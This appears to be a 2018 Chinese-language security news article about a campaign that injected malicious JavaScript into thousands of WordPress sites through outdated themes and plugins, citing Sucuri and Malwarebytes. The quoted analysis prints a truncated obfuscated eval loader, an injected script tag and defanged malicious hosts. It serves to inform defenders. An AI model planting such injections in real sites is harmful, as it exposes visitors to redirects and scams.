防不勝防 成千上萬的 WordPress 網站被掛上惡意程式碼

Editor發表於2018-09-25

據來自 Sucuri 和 Malwarebytes 的安全研究員稱,本月有成千上萬的的 WordPress 網站遭到黑客入侵併被惡意程式碼攻擊。儘管這些事件的入口似乎都不同,但都遵循類似的模式 —— 從已知威脅者處載入惡意程式碼。研究人員認為入侵者正在想辦法獲取訪問這些網站的機會,他們不是利用 WordPress CMS 本身的漏洞,而是利用過時的主題和外掛中的漏洞。


當獲得對網站的訪問許可權時,他們會建立一個後門,以便日後訪問並修改網站的程式碼。


在多數情況下,他們會修改 PHP 或 JavaScript 檔案以載入惡意程式碼,儘管有些使用者報告記錄了他們對資料庫表的修改。


防不勝防 成千上萬的 WordPress 網站被掛上惡意程式碼


Malwarebytes 安全研究員 JérômeSegura 表示,這種惡意程式碼會篩選訪問過受感染網站的使用者,並將一些使用者重定向到技術支援詐騙網站。其中一些技術支援騙局正是利用 Google Chrome 的 “evil cursor” 漏洞,阻止使用者關閉惡意網站。


Sucuri研究員Denis Sinegubko 於9月18日發文 Multi-Vector WordPress Infection from Examhome(內容見下)。


————————————————————————————————————————————————————————

具體內容:


今年9月,我們一直看到一股巨大的感染浪潮,它將惡意JavaScript程式碼注入.js,.php檔案和WordPress資料庫。


指令碼如下所示:


eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101,...skipped... 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125))

如果你解碼它,它會從hxxps://ads.voipnewswire [。] net / ad.js以及之後的hxxps:// examhome [。] net / stat.js?v = 1.0.2中注入指令碼。其他一些相關的URL是hxxps://cdn.allyouwant [。] online / main.js?t = chxxps:// mp3menu [。] org / mp3.js,/ b>


有時,可以將指向此類指令碼的連結注入到wp_posts表中,而無需任何混淆,例如:


<scr ipt src='hxxps://cdn.examhome[.]net/cdn.js?ver=1.0.5' type='text/javascript'></script>

此廣告系列中使用了許多不同的攻擊媒介。惡意軟體的位置差異很大,這個惡意軟體的更常見版本可以在名稱中包含jquery的.js檔案中找到。或者它們被注入到易受攻擊的WordPress主題和外掛的設定中,例如,非常舊的tagDiv主題(報紙,Newsmag及其衍生物)或未修補的智慧谷歌程式碼插入器外掛。


———————————————————————————————————————————————————————


這場 WordPress 網站劫持活動於本月開始,並在最近幾天加劇。將這次攻擊的 JavaScript 惡意程式碼片斷放到搜尋引擎搜尋,會有超過 2,500 個結果。而這只是被黑客攻擊的網站總數的一小部分。


防不勝防 成千上萬的 WordPress 網站被掛上惡意程式碼



參考來源:

  • 開源中國
  • Sucuri

宣告:本網站所提供的資訊僅供參考之用,並不代表本網站贊同其觀點,也不代表本網站對其真實性負責。 




看雪閱讀推薦:


1、[分享]一張表格看懂:市面上最為常見的 Android 安裝包(APK)五代加固技術發展歷程及優缺點比較!


2、[原創]Xposed第三課(微信篇) 防止好友訊息撤回


3、[原創]bindiff基本使用以及小試牛刀


4、[分享]【看雪安全開發者峰會2018】議題:自動逆向機器人


5、[翻譯]ARM彙編簡介(六)堆疊和函式

相關文章